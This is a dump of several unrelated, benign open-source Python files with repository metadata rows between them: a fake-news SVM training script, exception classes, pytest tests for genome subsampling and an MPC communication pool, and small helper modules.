] | 1 | 2020-09-22T12:00:06.000Z | 2020-09-24T19:09:04.000Z | Code/models/SVM/lSVC.py | SimonKenoby/Master-Thesis-Fake-News-Dectection | 2c3a5e82d4c7d6294ca87c265a1b638d61f2cb08 | [
"MIT"
] | null | null | null | import numpy as np
import os
import sklearn
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.svm import LinearSVC
from sklearn.model_selection import train_test_split, KFold
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.naive_bayes import MultinomialNB
from pymongo import MongoClient
import datetime
import sys
sys.path.append('../..')
import utils.dbUtils
import utils.gensimUtils
client = MongoClient('localhost', 27017)
db = client.TFE
collection = db.results
idx = collection.insert_one({'model' : 'linear_svc', 'date' : datetime.datetime.now(), 'downsampling' : False, 'smote' : False, 'corpus' : 'news_cleaned', 'penality' : 'l2'})
print('Creating corpus')
corpus = utils.dbUtils.TokenizedIterator('news_cleaned', filters = {'type' : {'$in' : ['fake', 'reliable']}})
print('Creating labels')
y = np.array([x for x in corpus.iterTags()])
train_accuracy = []
test_accuracy = []
kf = KFold(n_splits=3, shuffle = True)
i = 1
for i, (train_index, test_index) in enumerate(kf.split(y)):
print('Train and test set {}'.format(i))
model = LinearSVC()
vectorizer = TfidfVectorizer()
print('\t Fiting tf-idf')
X_train = vectorizer.fit_transform([' '.join(corpus[i]) for i in train_index])
X_test = vectorizer.transform([' '.join(corpus[i]) for i in test_index])
y_train = y[train_index]
y_test = y[test_index]
print('\t fiting model')
model.fit(X_train, y_train)
print('\t Testing model')
train_accuracy.append(model.score(X_train, y_train))
test_accuracy.append(model.score(X_test, y_test))
#print("Training accuracy : {}".format(model.score(X_train, y_train)))
#print("Test accuracy : {}".format(model.score(X_test, y_test)))
#print("Classification report for test set")
#print(classification_report(y_test, model.predict(X_test)))
crp = classification_report(y_test, model.predict(X_test), labels=['fake', 'reliable'], output_dict = True)
collection.update_one({'_id' : idx.inserted_id}, {'$push' : {'classification_report' : crp, 'train_accuracy' : model.score(X_train, y_train), 'test_accuracy' : model.score(X_test, y_test)}})
collection.update_one({'_id' : idx.inserted_id}, {'$set' : {'mean_test_accuracy' : np.mean(test_accuracy) }})
idx = collection.insert_one({'model' : 'linear_svc', 'date' : datetime.datetime.now(), 'downsampling' : True, 'smote' : False, 'corpus' : 'news_cleaned', 'penality' : 'l2'})
print('Creating corpus')
corpus = utils.dbUtils.TokenizedIterator('news_cleaned', filters = {'type' : {'$in' : ['fake', 'reliable']}, 'domain' : {'$nin' : ['nytimes.com', 'beforeitsnews.com']}})
print('Creating labels')
y = np.array([x for x in corpus.iterTags()])
train_accuracy = []
test_accuracy = []
kf = KFold(n_splits=3, shuffle = True)
for i, (train_index, test_index) in enumerate(kf.split(y)):
print('Train and test set {}'.format(i))
model = LinearSVC()
vectorizer = TfidfVectorizer()
print('\t Fiting tf-idf')
X_train = vectorizer.fit_transform([' '.join(corpus[i]) for i in train_index])
X_test = vectorizer.transform([' '.join(corpus[i]) for i in test_index])
y_train = y[train_index]
y_test = y[test_index]
print('\t fiting model')
model.fit(X_train, y_train)
print('\t Testing model')
train_accuracy.append(model.score(X_train, y_train))
test_accuracy.append(model.score(X_test, y_test))
#print("Training accuracy : {}".format(model.score(X_train, y_train)))
#print("Test accuracy : {}".format(model.score(X_test, y_test)))
#print("Classification report for test set")
crp = classification_report(y_test, model.predict(X_test), labels=['fake', 'reliable'], output_dict = True)
collection.update_one({'_id' : idx.inserted_id}, {'$push' : {'classification_report' : crp, 'train_accuracy' : model.score(X_train, y_train), 'test_accuracy' : model.score(X_test, y_test)}})
collection.update_one({'_id' : idx.inserted_id}, {'$set' : {'mean_test_accuracy' : np.mean(test_accuracy) }}) | 43.978261 | 194 | 0.702422 | 556 | 4,046 | 4.913669 | 0.201439 | 0.023792 | 0.048316 | 0.035139 | 0.817716 | 0.817716 | 0.817716 | 0.817716 | 0.802343 | 0.802343 | 0 | 0.002855 | 0.134207 | 4,046 | 92 | 195 | 43.978261 | 0.777048 | 0.101087 | 0 | 0.676471 | 0 | 0 | 0.172955 | 0.011567 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.191176 | 0 | 0.191176 | 0.176471 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c2c016863a2437cf0a833875a0eb549b7d61c889 | 36 | py | Python | seven/t/__init__.py | xiaolinzi-xl/python_imooc | 07bde890e3ab0ddef4467b0c77ef33614339a657 | [
"Apache-2.0"
] | null | null | null | seven/t/__init__.py | xiaolinzi-xl/python_imooc | 07bde890e3ab0ddef4467b0c77ef33614339a657 | [
"Apache-2.0"
] | null | null | null | seven/t/__init__.py | xiaolinzi-xl/python_imooc | 07bde890e3ab0ddef4467b0c77ef33614339a657 | [
"Apache-2.0"
] | null | null | null | import sys
import io
import datetime | 12 | 15 | 0.861111 | 6 | 36 | 5.166667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138889 | 36 | 3 | 15 | 12 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6c5da96f2fc505244fe3561dfa3aa74a2b445853 | 347 | py | Python | eosjs_python/Exceptions.py | ankitwandx/eosjs_python | 07e5bc8f8508aa83a7d6bde4f54e9e6728d97b30 | [
"MIT"
] | 45 | 2018-06-04T20:19:17.000Z | 2021-12-24T16:44:43.000Z | eosjs_python/Exceptions.py | ankitwandx/eosjs_python | 07e5bc8f8508aa83a7d6bde4f54e9e6728d97b30 | [
"MIT"
] | 11 | 2018-08-31T13:56:13.000Z | 2022-03-09T21:26:43.000Z | eosjs_python/Exceptions.py | ankitwandx/eosjs_python | 07e5bc8f8508aa83a7d6bde4f54e9e6728d97b30 | [
"MIT"
] | 15 | 2018-06-18T10:22:29.000Z | 2022-03-16T06:23:09.000Z | class GenerateKeysException(Exception):
pass
class CreateAccountException(Exception):
pass
class PushContractTransactionException(Exception):
pass
class GetTableException(Exception):
pass
class GetBalanceException(Exception):
pass
class GetAccountException(Exception):
pass
class EncryptSecretException(Exception):
pass | 17.35 | 50 | 0.801153 | 28 | 347 | 9.928571 | 0.357143 | 0.327338 | 0.388489 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138329 | 347 | 20 | 51 | 17.35 | 0.929766 | 0 | 0 | 0.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
6697ab6a8ecd3e31f8376069a5993fc1fcae5753 | 2,813 | py | Python | tests/processing/test_shape.py | tug-cps/datamodels | ae0e59e29e07648c414218c5b4d972d2c8f48a68 | [
"MIT"
] | null | null | null | tests/processing/test_shape.py | tug-cps/datamodels | ae0e59e29e07648c414218c5b4d972d2c8f48a68 | [
"MIT"
] | null | null | null | tests/processing/test_shape.py | tug-cps/datamodels | ae0e59e29e07648c414218c5b4d972d2c8f48a68 | [
"MIT"
] | null | null | null | import numpy as np
import pytest
from datamodels import processing
def test_prevent_zeros_scalar():
data = 0
corrected_data = processing.shape.prevent_zeros(data)
assert corrected_data == 1
def test_prevent_zeros_all_zeros_array():
data = np.zeros((4,))
corrected_data = processing.shape.prevent_zeros(data)
assert np.all(np.isclose(corrected_data, np.ones_like(data)))
def test_prevent_zeros_one_zero_array():
data = np.array([1.0, 1.0, 1.0, 0.0, 1.0])
corrected_data = processing.shape.prevent_zeros(data)
assert np.all(np.isclose(corrected_data, np.ones_like(data)))
@pytest.mark.parametrize(
"lookback, lookahead", [(0, 0), (0, 1), (0, 2), (1, 1), (2, 1)]
)
def test_get_windows(lookback, lookahead):
samples = 5
input_features = 4
target_features = 1
features = np.reshape(
np.arange(samples * input_features), (samples, input_features)
)
targets = np.reshape(
np.arange(samples * target_features), (samples, target_features)
)
x, y = processing.shape.get_windows(
lookback, features, lookahead, targets, targets_as_sequence=True
)
expected_shape_x = (samples - lookback - lookahead, lookback + 1, input_features)
expected_shape_y = (samples - lookback - lookahead, lookahead + 1, target_features)
assert x.shape == expected_shape_x
assert y.shape == expected_shape_y
# assert that there are not duplicate entries
_, counts = np.unique(x, return_counts=True, axis=0)
assert np.all(counts == 1), f"not all samples are unique, x: {x}"
_, counts = np.unique(y, return_counts=True, axis=0)
assert np.all(counts == 1), f"not all samples are unique, y: {y}"
@pytest.mark.parametrize(
"lookback, lookahead", [(0, 0), (0, 1), (0, 2), (1, 1), (2, 1)]
)
def test_get_windows_single_targets(lookback, lookahead):
samples = 5
input_features = 2
target_features = 1
features = np.reshape(
np.arange(samples * input_features), (samples, input_features)
)
targets = np.reshape(
np.arange(samples * target_features), (samples, target_features)
)
x, y = processing.shape.get_windows(
lookback, features, lookahead, targets, targets_as_sequence=False
)
expected_shape_x = (samples - lookback - lookahead, lookback + 1, input_features)
expected_shape_y = (samples - lookback - lookahead, 1, target_features)
assert x.shape == expected_shape_x
assert y.shape == expected_shape_y
# assert that there are not duplicate entries
_, counts = np.unique(x, return_counts=True, axis=0)
assert np.all(counts == 1), f"not all samples are unique, x: {x}"
_, counts = np.unique(y, return_counts=True, axis=0)
assert np.all(counts == 1), f"not all samples are unique, y: {y}"
| 29.610526 | 87 | 0.678279 | 392 | 2,813 | 4.673469 | 0.153061 | 0.074236 | 0.036026 | 0.037118 | 0.882642 | 0.880459 | 0.838974 | 0.838974 | 0.838974 | 0.81059 | 0 | 0.022667 | 0.200142 | 2,813 | 94 | 88 | 29.925532 | 0.791556 | 0.030928 | 0 | 0.587302 | 0 | 0 | 0.0639 | 0 | 0 | 0 | 0 | 0 | 0.174603 | 1 | 0.079365 | false | 0 | 0.047619 | 0 | 0.126984 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
66e4b6b166be940664b5d53e9c253a32f296e36f | 307 | py | Python | vect/showRepresentation.py | ALEJORIOS/vect | 458f2b30049c0d52dd88d98fe009e33661276742 | [
"MIT"
] | 1 | 2021-07-11T05:39:00.000Z | 2021-07-11T05:39:00.000Z | vect/showRepresentation.py | ALEJORIOS/vect | 458f2b30049c0d52dd88d98fe009e33661276742 | [
"MIT"
] | null | null | null | vect/showRepresentation.py | ALEJORIOS/vect | 458f2b30049c0d52dd88d98fe009e33661276742 | [
"MIT"
] | null | null | null | def vector(self, raw = False):
return "array({})".format(self.vector) if raw else "{}".format(self.vector)
def matrix(self, raw = False):
if raw:
return "{}".format(self.mat) if raw else "{}".format(self.mat)
else:
return "\n".join([str(self.mat[i]) for i in range(self.rows)]) | 38.375 | 79 | 0.602606 | 47 | 307 | 3.93617 | 0.425532 | 0.216216 | 0.12973 | 0.162162 | 0.205405 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.19544 | 307 | 8 | 80 | 38.375 | 0.748988 | 0 | 0 | 0 | 0 | 0 | 0.055195 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0 | 0.142857 | 0.714286 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
dd1e4fa52600df69fab59fb4da4b68691d0ab31e | 27 | py | Python | src/main.py | shunw/machine_learn | f4509466e85298566c8d115c0540623c8f38b92f | [
"MIT"
] | null | null | null | src/main.py | shunw/machine_learn | f4509466e85298566c8d115c0540623c8f38b92f | [
"MIT"
] | null | null | null | src/main.py | shunw/machine_learn | f4509466e85298566c8d115c0540623c8f38b92f | [
"MIT"
] | null | null | null | print("Hello World Again!") | 27 | 27 | 0.740741 | 4 | 27 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 27 | 1 | 27 | 27 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0.642857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
dd781df2fdeb7417a62f9533f2ebdbf8ec82b312 | 83 | py | Python | apps/_minimal/__init__.py | DonaldMcC/py4web | 116aa9298aef07899eac13e2ea9c3e8a00dd1977 | [
"BSD-3-Clause"
] | 133 | 2019-07-24T11:32:34.000Z | 2022-03-25T02:43:55.000Z | apps/_minimal/__init__.py | DonaldMcC/py4web | 116aa9298aef07899eac13e2ea9c3e8a00dd1977 | [
"BSD-3-Clause"
] | 396 | 2019-07-24T06:30:19.000Z | 2022-03-24T07:59:07.000Z | apps/_minimal/__init__.py | DonaldMcC/py4web | 116aa9298aef07899eac13e2ea9c3e8a00dd1977 | [
"BSD-3-Clause"
] | 159 | 2019-07-24T11:32:37.000Z | 2022-03-28T15:17:05.000Z | from py4web import action
@action("index")
def index():
return "Hello World"
| 11.857143 | 25 | 0.686747 | 11 | 83 | 5.181818 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014925 | 0.192771 | 83 | 6 | 26 | 13.833333 | 0.835821 | 0 | 0 | 0 | 0 | 0 | 0.192771 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
dd88b0096f606e05fdd234788119f204565d358f | 32 | py | Python | JupyterHTMLSlides/__init__.py | williamegomezo/JupyterSlides | 403fe15e360eb1d79bf813b923eb569a81ab0934 | [
"MIT"
] | 1 | 2019-07-26T20:59:47.000Z | 2019-07-26T20:59:47.000Z | JupyterHTMLSlides/__init__.py | williamegomezo/JupyterSlides | 403fe15e360eb1d79bf813b923eb569a81ab0934 | [
"MIT"
] | null | null | null | JupyterHTMLSlides/__init__.py | williamegomezo/JupyterSlides | 403fe15e360eb1d79bf813b923eb569a81ab0934 | [
"MIT"
] | null | null | null | from .core import JupyterSlides
| 16 | 31 | 0.84375 | 4 | 32 | 6.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 32 | 1 | 32 | 32 | 0.964286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
661825e4ea78dc1fbade05205709f505ce4b743c | 8,956 | py | Python | genome_sampler/tests/test_subsample_longitudinal.py | thermokarst-forks/genome-sampler | 30a837b42f927d5d85c9edf01e9cbed3d28a9697 | [
"BSD-3-Clause"
] | null | null | null | genome_sampler/tests/test_subsample_longitudinal.py | thermokarst-forks/genome-sampler | 30a837b42f927d5d85c9edf01e9cbed3d28a9697 | [
"BSD-3-Clause"
] | null | null | null | genome_sampler/tests/test_subsample_longitudinal.py | thermokarst-forks/genome-sampler | 30a837b42f927d5d85c9edf01e9cbed3d28a9697 | [
"BSD-3-Clause"
] | null | null | null | import unittest
import pandas as pd
import numpy as np
import qiime2
from genome_sampler.subsample_longitudinal import subsample_longitudinal
class TestSubsampleLongitudinal(unittest.TestCase):
_N_TEST_ITERATIONS = 50
def setUp(self):
s1 = pd.Series(['2019-12-31', '2020-01-09', '2020-01-10',
'2019-11-01', '2020-01-11', '2020-02-21',
'2020-02-21', '2020-02-21', '2020-03-15'],
index=[chr(x) for x in range(65, 74)])
s1.index.name = 'id'
s1.name = 'date-md'
self.md1 = qiime2.CategoricalMetadataColumn(s1)
s2 = pd.Series(['2020-01-02', '2019-11-01', '2020-02-21',
'2020-02-21', '2020-02-21', '2020-03-15',
'2020-01-03', '2020-01-04', '2020-01-05',
'2020-01-06', '2020-01-07', '2020-01-08',
'2020-01-09', '2020-01-10', '2020-01-11',
'2020-01-12', '2020-01-13', '2020-01-14',
'2020-01-15', '2020-01-16', '2020-01-17'],
index=[chr(x) for x in range(65, 86)])
s2.index.name = 'id'
s2.name = 'date-md'
self.md2 = qiime2.CategoricalMetadataColumn(s2)
def test_default(self):
sel = subsample_longitudinal(self.md1)
self.assertEqual(sel.inclusion.sum(), 9)
self.assertEqual(sel.metadata.get_column('date-md'), self.md1)
self.assertEqual(sel.label, 'subsample_longitudinal')
def test_start_date_in_data(self):
sel = subsample_longitudinal(self.md1, start_date='2019-12-31')
self.assertEqual(sel.inclusion.sum(), 8)
self.assertEqual(sel.metadata.get_column('date-md'), self.md1)
self.assertEqual(sel.label, 'subsample_longitudinal')
self.assertFalse(np.nan in list(sel.inclusion.index))
def test_start_date_not_in_data(self):
sel = subsample_longitudinal(self.md1, start_date='2019-12-30')
self.assertEqual(sel.inclusion.sum(), 8)
self.assertEqual(sel.metadata.get_column('date-md'), self.md1)
self.assertEqual(sel.label, 'subsample_longitudinal')
self.assertFalse(np.nan in list(sel.inclusion.index))
def test_one_sample_per_interval(self):
sel = subsample_longitudinal(self.md1, samples_per_interval=1)
self.assertEqual(sel.inclusion.sum(), 6)
self.assertEqual(sel.metadata.get_column('date-md'), self.md1)
self.assertEqual(sel.label, 'subsample_longitudinal')
def test_two_sample_per_interval(self):
sel = subsample_longitudinal(self.md1, samples_per_interval=2)
self.assertEqual(sel.inclusion.sum(), 8)
self.assertEqual(sel.metadata.get_column('date-md'), self.md1)
self.assertEqual(sel.label, 'subsample_longitudinal')
def test_interval_bounds1(self):
for _ in range(self._N_TEST_ITERATIONS):
sel = subsample_longitudinal(self.md2, samples_per_interval=1,
start_date='2019-12-26')
exp_int1_dates = ['2020-01-02', '2020-01-03', '2020-01-04',
'2020-01-05', '2020-01-06', '2020-01-07',
'2020-01-08']
exp_int2_dates = ['2020-01-09', '2020-01-10', '2020-01-11',
'2020-01-12', '2020-01-13', '2020-01-14',
'2020-01-15']
exp_int3_dates = ['2020-01-16', '2020-01-17']
exp_int4_dates = ['2020-02-21']
exp_int5_dates = ['2020-03-15']
self.assertEqual(sel.inclusion.sum(), 5)
self.assertEqual(sel.metadata.get_column('date-md'), self.md2)
self.assertEqual(sel.label, 'subsample_longitudinal')
sampled_dates = set(self.md2.to_series()[sel.inclusion].values)
self.assertEqual(len(sampled_dates & set(exp_int1_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int2_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int3_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int4_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int5_dates)), 1)
def test_interval_bounds2(self):
for _ in range(self._N_TEST_ITERATIONS):
sel = subsample_longitudinal(self.md2, samples_per_interval=1,
start_date='2019-12-27')
exp_int1_dates = ['2020-01-02']
exp_int2_dates = ['2020-01-03', '2020-01-04', '2020-01-05',
'2020-01-06', '2020-01-07', '2020-01-08',
'2020-01-09']
exp_int3_dates = ['2020-01-10', '2020-01-11', '2020-01-12',
'2020-01-13', '2020-01-14', '2020-01-15',
'2020-01-16']
exp_int4_dates = ['2020-01-17']
exp_int5_dates = ['2020-02-21']
exp_int6_dates = ['2020-03-15']
self.assertEqual(sel.inclusion.sum(), 6)
self.assertEqual(sel.metadata.get_column('date-md'), self.md2)
self.assertEqual(sel.label, 'subsample_longitudinal')
sampled_dates = set(self.md2.to_series()[sel.inclusion].values)
self.assertEqual(len(sampled_dates & set(exp_int1_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int2_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int3_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int4_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int5_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int6_dates)), 1)
def test_interval_bounds3(self):
for _ in range(self._N_TEST_ITERATIONS):
sel = subsample_longitudinal(self.md2, samples_per_interval=1,
start_date='2019-12-28')
exp_int1_dates = ['2020-01-02', '2020-01-03']
exp_int2_dates = ['2020-01-04', '2020-01-05',
'2020-01-06', '2020-01-07', '2020-01-08',
'2020-01-09', '2020-01-10']
exp_int3_dates = ['2020-01-11', '2020-01-12',
'2020-01-13', '2020-01-14', '2020-01-15',
'2020-01-16', '2020-01-17']
exp_int4_dates = ['2020-02-21']
exp_int5_dates = ['2020-03-15']
self.assertEqual(sel.inclusion.sum(), 5)
self.assertEqual(sel.metadata.get_column('date-md'), self.md2)
self.assertEqual(sel.label, 'subsample_longitudinal')
sampled_dates = set(self.md2.to_series()[sel.inclusion].values)
self.assertEqual(len(sampled_dates & set(exp_int1_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int2_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int3_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int4_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int5_dates)), 1)
def test_interval_size(self):
for _ in range(self._N_TEST_ITERATIONS):
sel = subsample_longitudinal(self.md2, start_date='2019-12-19',
samples_per_interval=1,
days_per_interval=14)
exp_int1_dates = ['2020-01-02', '2020-01-03', '2020-01-04',
'2020-01-05', '2020-01-06', '2020-01-07',
'2020-01-08', '2020-01-09', '2020-01-10',
'2020-01-11', '2020-01-12', '2020-01-13',
'2020-01-14', '2020-01-15']
exp_int2_dates = ['2020-01-16', '2020-01-17']
exp_int3_dates = ['2020-02-21']
exp_int4_dates = ['2020-03-15']
self.assertEqual(sel.inclusion.sum(), 4)
self.assertEqual(sel.metadata.get_column('date-md'), self.md2)
self.assertEqual(sel.label, 'subsample_longitudinal')
sampled_dates = set(self.md2.to_series()[sel.inclusion].values)
self.assertEqual(len(sampled_dates & set(exp_int1_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int2_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int3_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int4_dates)), 1)
def test_seed(self):
sel1 = subsample_longitudinal(self.md2, samples_per_interval=1,
start_date='2019-12-26', seed=1)
for _ in range(self._N_TEST_ITERATIONS):
sel2 = subsample_longitudinal(self.md2, samples_per_interval=1,
start_date='2019-12-26', seed=1)
self.assertEqual(list(sel1.inclusion.items()),
list(sel2.inclusion.items()))
| 48.410811 | 75 | 0.567776 | 1,140 | 8,956 | 4.271053 | 0.103509 | 0.10228 | 0.099815 | 0.10269 | 0.865475 | 0.834463 | 0.819881 | 0.813925 | 0.798932 | 0.774286 | 0 | 0.159466 | 0.289303 | 8,956 | 184 | 76 | 48.673913 | 0.605499 | 0 | 0 | 0.5 | 0 | 0 | 0.153975 | 0.022108 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.073333 | false | 0 | 0.033333 | 0 | 0.12 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
661cdc9461c78b85fc0ec616f30da630de544b41 | 102 | py | Python | Test.py | LovingThresh/CJTeam | ce03e107e0b33ac8132d4d6369fd7f98013e7563 | [
"Apache-2.0"
] | 1 | 2022-03-28T05:57:45.000Z | 2022-03-28T05:57:45.000Z | Test.py | LovingThresh/CJTeam | ce03e107e0b33ac8132d4d6369fd7f98013e7563 | [
"Apache-2.0"
] | null | null | null | Test.py | LovingThresh/CJTeam | ce03e107e0b33ac8132d4d6369fd7f98013e7563 | [
"Apache-2.0"
] | null | null | null |
import tensorflow as tf
import tensorflow.keras as keras
from tensorflow.keras.layers import Conv2D
| 17 | 42 | 0.833333 | 15 | 102 | 5.666667 | 0.533333 | 0.376471 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011364 | 0.137255 | 102 | 5 | 43 | 20.4 | 0.954545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b0869f013bcf22d50630af0b973389bfd231a181 | 5,351 | py | Python | tno/mpc/communication/test/test_pool_http_3p.py | TNO-MPC/communication | 5ebf90e3672873cda1c4cc04b94353101fd4f480 | [
"Apache-2.0"
] | 2 | 2021-04-09T07:20:12.000Z | 2021-04-23T10:08:52.000Z | tno/mpc/communication/test/test_pool_http_3p.py | TNO-MPC/communication | 5ebf90e3672873cda1c4cc04b94353101fd4f480 | [
"Apache-2.0"
] | 2 | 2021-12-03T10:21:33.000Z | 2022-03-31T12:40:21.000Z | tno/mpc/communication/test/test_pool_http_3p.py | TNO-MPC/communication | 5ebf90e3672873cda1c4cc04b94353101fd4f480 | [
"Apache-2.0"
] | null | null | null | """
This module tests the communication between three communication pools.
"""
from typing import Any, Optional, Tuple
import pytest
from tno.mpc.communication import Pool
from tno.mpc.communication.test import ( # pylint: disable=unused-import
event_loop,
fixture_pool_http_3p,
)
@pytest.mark.asyncio
async def send_message(
pools: Tuple[Pool, ...],
sender: int,
receiver: int,
message: Any,
msg_id: Optional[str] = None,
) -> None:
"""
Send a message
:param pools: the communication pools to use
:param sender: the id of the sending party
:param receiver: the id of the receiving party
:param message: the message to send
:param msg_id: the message id to use
"""
await pools[sender].send(f"local{receiver}", message, msg_id)
@pytest.mark.asyncio
async def assert_recv_message(
pools: Tuple[Pool, ...],
sender: int,
receiver: int,
message: Any,
msg_id: Optional[str] = None,
) -> None:
"""
Receives a message and validates whether it is in line with the expected message
:param pools: the communication pools to use
:param sender: the id of the sending party
:param receiver: the id of the receiving party
:param message: the expected message
:param msg_id: the message id of the expected message
"""
res = await pools[receiver].recv(f"local{sender}", msg_id)
assert res == message
@pytest.mark.asyncio
async def assert_send_message(
pools: Tuple[Pool, ...],
sender: int,
receiver: int,
message: Any,
msg_id: Optional[str] = None,
) -> None:
"""
Sends a message and validates whether it is received correctly
:param pools: the communication pools to use
:param sender: the id of the sending party
:param receiver: the id of the receiving party
:param message: the message
:param msg_id: the message id to use
"""
await send_message(pools, sender, receiver, message, msg_id)
await assert_recv_message(pools, sender, receiver, message, msg_id)
@pytest.mark.asyncio
async def test_http_3p_server(pool_http_3p: Tuple[Pool, Pool, Pool]) -> None:
"""
Tests sending and receiving of multiple messages between three communication pools
:param pool_http_3p: collection of three communication pools
"""
await assert_send_message(pool_http_3p, 0, 1, "Hello1!")
await assert_send_message(pool_http_3p, 0, 2, "Hello2!")
await assert_send_message(pool_http_3p, 1, 0, "Hello3!")
await assert_send_message(pool_http_3p, 1, 2, "Hello4!")
await assert_send_message(pool_http_3p, 2, 0, "Hello5!")
await assert_send_message(pool_http_3p, 2, 1, "Hello6!")
@pytest.mark.asyncio
async def test_http_3p_server_2(pool_http_3p: Tuple[Pool, Pool, Pool]) -> None:
"""
Tests sending and receiving of multiple messages between three communication pools
:param pool_http_3p: collection of three communication pools
"""
await assert_send_message(pool_http_3p, 0, 1, "Hello1!")
await assert_send_message(pool_http_3p, 0, 1, "Hello2!")
await assert_send_message(pool_http_3p, 0, 1, "Hello1!")
@pytest.mark.asyncio
async def test_http_3p_server_3(pool_http_3p: Tuple[Pool, Pool, Pool]) -> None:
"""
Tests sending and receiving of multiple messages between three communication pools
:param pool_http_3p: collection of three communication pools
"""
